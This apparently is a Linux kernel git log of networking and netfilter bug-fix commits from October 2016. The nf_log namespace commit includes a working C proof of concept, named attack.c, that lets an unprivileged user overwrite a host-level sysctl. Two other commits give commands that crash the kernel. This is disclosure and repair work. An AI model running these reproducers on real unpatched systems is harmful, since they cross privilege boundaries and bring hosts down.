1. 11 Oct, 2016 1 commit
  2. 08 Oct, 2016 4 commits
  3. 07 Oct, 2016 4 commits
  4. 06 Oct, 2016 15 commits
  5. 05 Oct, 2016 2 commits
  6. 04 Oct, 2016 13 commits
    • Liping Zhang's avatar
      netfilter: nft_limit: fix divided by zero panic · 2fa46c13
      Liping Zhang authored
      After I input the following nftables rule, a panic happened on my system:
        # nft add rule filter OUTPUT limit rate 0xf00000000 bytes/second
      
        divide error: 0000 [#1] SMP
        [ ... ]
        RIP: 0010:[<ffffffffa059035e>]  [<ffffffffa059035e>]
        nft_limit_pkt_bytes_eval+0x2e/0xa0 [nft_limit]
        Call Trace:
        [<ffffffffa05721bb>] nft_do_chain+0xfb/0x4e0 [nf_tables]
        [<ffffffffa044f236>] ? nf_nat_setup_info+0x96/0x480 [nf_nat]
        [<ffffffff81753767>] ? ipt_do_table+0x327/0x610
        [<ffffffffa044f677>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat]
        [<ffffffffa058b21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4]
        [<ffffffff816f4aa2>] nf_iterate+0x62/0x80
        [<ffffffff816f4b33>] nf_hook_slow+0x73/0xd0
        [<ffffffff81703d0d>] __ip_local_out+0xcd/0xe0
        [<ffffffff81701d90>] ? ip_forward_options+0x1b0/0x1b0
        [<ffffffff81703d3c>] ip_local_out+0x1c/0x40
      
      This is because divisor is 64-bit, but we treat it as a 32-bit integer,
      then 0xf00000000 becomes zero, i.e. divisor becomes 0.
      Signed-off-by: default avatarLiping Zhang <liping.zhang@spreadtrum.com>
      Signed-off-by: default avatarPablo Neira Ayuso <pablo@netfilter.org>
      2fa46c13
    • Jann Horn's avatar
      netfilter: fix namespace handling in nf_log_proc_dostring · dbb5918c
      Jann Horn authored
      nf_log_proc_dostring() used current's network namespace instead of the one
      corresponding to the sysctl file the write was performed on. Because the
      permission check happens at open time and the nf_log files in namespaces
      are accessible for the namespace owner, this can be abused by an
      unprivileged user to effectively write to the init namespace's nf_log
      sysctls.
      
      Stash the "struct net *" in extra2 - data and extra1 are already used.
      
      Repro code:
      
      #define _GNU_SOURCE
      #include <stdlib.h>
      #include <sched.h>
      #include <err.h>
      #include <sys/mount.h>
      #include <sys/types.h>
      #include <sys/wait.h>
      #include <fcntl.h>
      #include <unistd.h>
      #include <string.h>
      #include <stdio.h>
      
      char child_stack[1000000];
      
      uid_t outer_uid;
      gid_t outer_gid;
      int stolen_fd = -1;
      
      void writefile(char *path, char *buf) {
              int fd = open(path, O_WRONLY);
              if (fd == -1)
                      err(1, "unable to open thing");
              if (write(fd, buf, strlen(buf)) != strlen(buf))
                      err(1, "unable to write thing");
              close(fd);
      }
      
      int child_fn(void *p_) {
              if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
                        NULL))
                      err(1, "mount");
      
              /* Yes, we need to set the maps for the net sysctls to recognize us
               * as namespace root.
               */
              char buf[1000];
              sprintf(buf, "0 %d 1\n", (int)outer_uid);
              writefile("/proc/1/uid_map", buf);
              writefile("/proc/1/setgroups", "deny");
              sprintf(buf, "0 %d 1\n", (int)outer_gid);
              writefile("/proc/1/gid_map", buf);
      
              stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
              if (stolen_fd == -1)
                      err(1, "open nf_log");
              return 0;
      }
      
      int main(void) {
              outer_uid = getuid();
              outer_gid = getgid();
      
              int child = clone(child_fn, child_stack + sizeof(child_stack),
                                CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
                                |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
              if (child == -1)
                      err(1, "clone");
              int status;
              if (wait(&status) != child)
                      err(1, "wait");
              if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                      errx(1, "child exit status bad");
      
              char *data = "NONE";
              if (write(stolen_fd, data, strlen(data)) != strlen(data))
                      err(1, "write");
              return 0;
      }
      
      Repro:
      
      $ gcc -Wall -o attack attack.c -std=gnu99
      $ cat /proc/sys/net/netfilter/nf_log/2
      nf_log_ipv4
      $ ./attack
      $ cat /proc/sys/net/netfilter/nf_log/2
      NONE
      
      Because this looks like an issue with very low severity, I'm sending it to
      the public list directly.
      Signed-off-by: default avatarJann Horn <jann@thejh.net>
      Signed-off-by: default avatarPablo Neira Ayuso <pablo@netfilter.org>
      dbb5918c
    • Gavin Shan's avatar
      net/ncsi: Introduce ncsi_stop_dev() · c0cd1ba4
      Gavin Shan authored
      This introduces ncsi_stop_dev(), as counterpart to ncsi_start_dev(),
      to stop the NCSI device so that it can be reenabled in future. This
      API should be called when the network device driver is going to
      shutdown the device. There are 3 things done in the function: Stop
      the channel monitoring; Reset channels to inactive state; Report
      NCSI link down.
      Signed-off-by: default avatarGavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley's avatarJoel Stanley <joel@jms.id.au>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      c0cd1ba4
    • Gavin Shan's avatar
      net/ncsi: Rework the channel monitoring · 83afdc6a
      Gavin Shan authored
      The original NCSI channel monitoring was implemented based on a
      backoff algorithm: the GLS response should be received in the
      specified interval. Otherwise, the channel is regarded as dead
      and failover should be taken if current channel is an active one.
      There are several problems in the implementation: (A) On BCM5718,
      we found when the IID (Instance ID) in the GLS command packet
      changes from 255 to 1, the response corresponding to IID#1 never
      comes in. It means we cannot make the unfair judgement that the
      channel is dead when one response is missed. (B) The code's
      readability should be improved. (C) We should do failover when
      current channel is active one and the channel monitoring should
      be marked as disabled before doing failover.
      
      This reworks the channel monitoring to address all above issues.
      The fields for channel monitoring is put into separate struct
      and the state of channel monitoring is predefined. The channel
      is regarded alive if the network controller responses to one of
      two GLS commands or both of them in 5 seconds.
      Signed-off-by: default avatarGavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley's avatarJoel Stanley <joel@jms.id.au>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      83afdc6a
    • Gavin Shan's avatar
      net/ncsi: Allow to extend NCSI request properties · a0509cbe
      Gavin Shan authored
      There is only one NCSI request property for now: the response for
      the sent command need drive the workqueue or not. So we had one
      field (@driven) for the purpose. We lost the flexibility to extend
      NCSI request properties.
      
      This replaces @driven with @flags and @req_flags in NCSI request
      and NCSI command argument struct. Each bit of the newly introduced
      field can be used for one property. No functional changes introduced.
      Signed-off-by: default avatarGavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley's avatarJoel Stanley <joel@jms.id.au>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      a0509cbe
    • Gavin Shan's avatar
      net/ncsi: Rework request index allocation · a15af54f
      Gavin Shan authored
      The NCSI request index (struct ncsi_request::id) is put into instance
      ID (IID) field while sending NCSI command packet. It was designed the
      available IDs are given in round-robin fashion. @ndp->request_id was
      introduced to represent the next available ID, but it has been used
      as number of successively allocated IDs. It breaks the round-robin
      design. Besides, we shouldn't put 0 to NCSI command packet's IID
      field, meaning ID#0 should be reserved according section 6.3.1.1
      in NCSI spec (v1.1.0).
      
      This fixes above two issues. With it applied, the available IDs will
      be assigned in round-robin fashion and ID#0 won't be assigned.
      Signed-off-by: default avatarGavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley's avatarJoel Stanley <joel@jms.id.au>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      a15af54f
    • Gavin Shan's avatar
      net/ncsi: Don't probe on the reserved channel ID (0x1f) · 55e02d08
      Gavin Shan authored
      We needn't send CIS (Clear Initial State) command to the NCSI
      reserved channel (0x1f) in the enumeration. We shouldn't receive
      a valid response from CIS on NCSI channel 0x1f.
      Signed-off-by: default avatarGavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley's avatarJoel Stanley <joel@jms.id.au>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      55e02d08
    • Gavin Shan's avatar
      net/ncsi: Introduce NCSI_RESERVED_CHANNEL · bc7e0f50
      Gavin Shan authored
      This defines NCSI_RESERVED_CHANNEL as the reserved NCSI channel
      ID (0x1f). No logical changes introduced.
      Signed-off-by: default avatarGavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley's avatarJoel Stanley <joel@jms.id.au>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      bc7e0f50
    • Gavin Shan's avatar
      net/ncsi: Avoid unused-value build warning from ia64-linux-gcc · d8cedaab
      Gavin Shan authored
      xchg() is used to set NCSI channel's state in order for consistent
      access to the state. xchg()'s return value should be used. Otherwise,
      one build warning will be raised (with -Wunused-value) as below message
      indicates. It is reported by ia64-linux-gcc (GCC) 4.9.0.
      
       net/ncsi/ncsi-manage.c: In function 'ncsi_channel_monitor':
       arch/ia64/include/uapi/asm/cmpxchg.h:56:2: warning: value computed is \
       not used [-Wunused-value]
        ((__typeof__(*(ptr))) __xchg((unsigned long) (x), (ptr), sizeof(*(ptr))))
         ^
       net/ncsi/ncsi-manage.c:202:3: note: in expansion of macro 'xchg'
        xchg(&nc->state, NCSI_CHANNEL_INACTIVE);
      
      This removes the atomic access to NCSI channel's state avoid the above
      build warning. We have to hold the channel's lock when its state is readed
      or updated. No functional changes introduced.
      Signed-off-by: default avatarGavin Shan <gwshan@linux.vnet.ibm.com>
      Reviewed-by: Joel Stanley's avatarJoel Stanley <joel@jms.id.au>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      d8cedaab
    • Andrew Collins's avatar
      net: Add netdev all_adj_list refcnt propagation to fix panic · 93409033
      Andrew Collins authored
      This is a respin of a patch to fix a relatively easily reproducible kernel
      panic related to the all_adj_list handling for netdevs in recent kernels.
      
      The following sequence of commands will reproduce the issue:
      
      ip link add link eth0 name eth0.100 type vlan id 100
      ip link add link eth0 name eth0.200 type vlan id 200
      ip link add name testbr type bridge
      ip link set eth0.100 master testbr
      ip link set eth0.200 master testbr
      ip link add link testbr mac0 type macvlan
      ip link delete dev testbr
      
      This creates an upper/lower tree of (excuse the poor ASCII art):
      
                  /---eth0.100-eth0
      mac0-testbr-
                  \---eth0.200-eth0
      
      When testbr is deleted, the all_adj_lists are walked, and eth0 is deleted twice from
      the mac0 list. Unfortunately, during setup in __netdev_upper_dev_link, only one
      reference to eth0 is added, so this results in a panic.
      
      This change adds reference count propagation so things are handled properly.
      
      Matthias Schiffer reported a similar crash in batman-adv:
      
      https://github.com/freifunk-gluon/gluon/issues/680
      https://www.open-mesh.org/issues/247
      
      which this patch also seems to resolve.
      Signed-off-by: default avatarAndrew Collins <acollins@cradlepoint.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      93409033
    • Shmulik Ladkani's avatar
      net: skbuff: Limit skb_vlan_pop/push() to expect skb->data at mac header · b6a79208
      Shmulik Ladkani authored
      skb_vlan_pop/push were too generic, trying to support the cases where
      skb->data is at mac header, and cases where skb->data is arbitrarily
      elsewhere.
      
      Supporting an arbitrary skb->data was complex and bogus:
       - It failed to unwind skb->data to its original location post actual
         pop/push.
         (Also, semantic is not well defined for unwinding: If data was into
          the eth header, need to use same offset from start; But if data was
          at network header or beyond, need to adjust the original offset
          according to the push/pull)
       - It mangled the rcsum post actual push/pop, without taking into account
         that the eth bytes might already have been pulled out of the csum.
      
      Most callers (ovs, bpf) already had their skb->data at mac_header upon
      invoking skb_vlan_pop/push.
      Last caller that failed to do so (act_vlan) has been recently fixed.
      
      Therefore, to simplify things, no longer support arbitrary skb->data
      inputs for skb_vlan_pop/push().
      
      skb->data is expected to be exactly at mac_header; WARN otherwise.
      Signed-off-by: default avatarShmulik Ladkani <shmulik.ladkani@gmail.com>
      Cc: Daniel Borkmann <daniel@iogearbox.net>
      Cc: Pravin Shelar <pshelar@ovn.org>
      Cc: Jiri Pirko <jiri@mellanox.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      b6a79208
    • Shmulik Ladkani's avatar
      net/sched: act_vlan: Push skb->data to mac_header prior calling skb_vlan_*() functions · f39acc84
      Shmulik Ladkani authored
      Generic skb_vlan_push/skb_vlan_pop functions don't properly handle the
      case where the input skb data pointer does not point at the mac header:
      
      - They're doing push/pop, but fail to properly unwind data back to its
        original location.
        For example, in the skb_vlan_push case, any subsequent
        'skb_push(skb, skb->mac_len)' calls make the skb->data point 4 bytes
        BEFORE start of frame, leading to bogus frames that may be transmitted.
      
      - They update rcsum per the added/removed 4 bytes tag.
        Alas if data is originally after the vlan/eth headers, then these
        bytes were already pulled out of the csum.
      
      OTOH calling skb_vlan_push/skb_vlan_pop with skb->data at mac_header
      present no issues.
      
      act_vlan is the only caller to skb_vlan_*() that has skb->data pointing
      at network header (upon ingress).
      Other calles (ovs, bpf) already adjust skb->data at mac_header.
      
      This patch fixes act_vlan to point to the mac_header prior calling
      skb_vlan_*() functions, as other callers do.
      Signed-off-by: default avatarShmulik Ladkani <shmulik.ladkani@gmail.com>
      Cc: Daniel Borkmann <daniel@iogearbox.net>
      Cc: Pravin Shelar <pshelar@ovn.org>
      Cc: Jiri Pirko <jiri@mellanox.com>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      f39acc84
    • Al Viro's avatar
      skb_splice_bits(): get rid of callback · 25869262
      Al Viro authored
      since pipe_lock is the outermost now, we don't need to drop/regain
      socket locks around the call of splice_to_pipe() from skb_splice_bits(),
      which kills the need to have a socket-specific callback; we can just
      call splice_to_pipe() and be done with that.
      Signed-off-by: default avatarAl Viro <viro@zeniv.linux.org.uk>
      25869262
  7. 03 Oct, 2016 1 commit
    • Ilya Dryomov's avatar
      libceph: ceph_build_auth() doesn't need ceph_auth_build_hello() · 464691bd
      Ilya Dryomov authored
      A static bug finder (EBA) on Linux 4.7:
      
          Double lock in net/ceph/auth.c
          second lock at 108: mutex_lock(& ac->mutex); [ceph_auth_build_hello]
          after calling from 263: ret = ceph_auth_build_hello(ac, msg_buf, msg_len);
          if ! ac->protocol -> true at 262
          first lock at 261: mutex_lock(& ac->mutex); [ceph_build_auth]
      
      ceph_auth_build_hello() is never called, because the protocol is always
      initialized, whether we are checking existing tickets (in delayed_work())
      or getting new ones after invalidation (in invalidate_authorizer()).
      Reported-by: default avatarIago Abal <iari@itu.dk>
      Signed-off-by: default avatarIlya Dryomov <idryomov@gmail.com>
      464691bd